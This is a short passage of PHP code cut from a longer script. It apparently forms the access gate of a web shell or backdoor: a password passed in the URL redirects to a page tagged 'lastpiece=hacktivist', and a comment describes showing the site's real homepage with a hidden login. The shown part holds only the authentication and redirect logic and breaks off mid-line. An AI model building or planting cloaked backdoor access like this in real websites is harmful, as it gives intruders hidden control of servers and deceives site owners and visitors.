ssword=xxx
    if (isset($_GET['password']) && !empty($_GET['password'])) {
        if (authenticate($_GET['password'])) {
            $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
            $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost');
            $scriptName = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '';
            header('Location: ' . $scheme . '://' . $host . $scriptName . '?lastpiece=hacktivist');
            exit;
        }
    }
    
    // Has param but not authenticated: show real homepage + hidden login
    $loginError = '';
    if (isset($_POST['login_password'])) {
        if (authenticate($_POST['login_password'])) {
            $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
            $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']